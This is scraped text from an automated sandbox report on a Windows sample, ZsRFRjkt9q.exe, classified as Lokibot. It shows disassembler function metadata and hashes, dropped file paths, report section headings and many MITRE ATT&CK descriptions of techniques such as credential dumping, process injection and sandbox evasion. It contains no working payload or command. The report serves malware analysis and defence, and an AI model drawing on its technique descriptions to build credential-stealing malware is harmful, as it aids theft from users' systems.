Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction ID: 13f6a2cf583bc8a725f1f575c1c2257464a34b3c5b58d174a526da678b5d1d8b
Opcode Fuzzy Hash: 233d69bc2109651c151c6ab7be64d206df7952a917d897a4023f45f426fbd46a
Instruction Fuzzy Hash: 04D0C9317863287BF26467719C0BFCA6B589B04B21F100D2AB645AA1D0CAA8A940876D

Function 00468698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004686A2
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004686B5

Part of subcall function 00447A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00447AD0

Strings

Shell_TrayWnd, xrefs: 0046869B

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction ID: 5327e4fa2a42480748bb7cc66d897ba954c2bddabe160150f35467a3ae9de0ec
Opcode Fuzzy Hash: b4470d1f9ad659eaf171918a0757bf9f5813ac0af4253caff46f67b33da8d22d
Instruction Fuzzy Hash: D7D0C931785328B7E26467719C0BFDA6B589B04B21F100D2AB649AA1D0CAA8A9408768

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ZsRFRjkt9q.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Lokibot

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\aut5FB5.tmp

C:\Users\user\AppData\Local\Temp\epistemology

C:\Users\user\AppData\Roaming\188E93\31437F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1002\bc49718863ee53e026d805ec372039e9_9e146be9-c76a-4720-bcdb-53011b87bd06

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Windows Analysis Report
ZsRFRjkt9q.exe

Function 0042B043 Relevance: 21.5, APIs: 14, Instructions: 537
COMMONLIBRARYCODE

Function 00403D19 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 151
windowCOMMON

Function 00403742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
timewindowregistryCOMMON

Function 0041DDC0 Relevance: 10.7, APIs: 7, Instructions: 175
COMMON

Function 0040406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 0044FA0C Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 238
COMMON

Function 00403F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
registrywindowclipboardCOMMON

Function 0044BFA4 Relevance: 18.3, APIs: 12, Instructions: 316
fileCOMMON

Function 00403E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66
windowregistryCOMMON

Function 009B5368 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 004049FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73
registryCOMMON

Function 004036B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 009B50D8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 164
fileCOMMON

Function 00404A30 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 138
COMMON

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre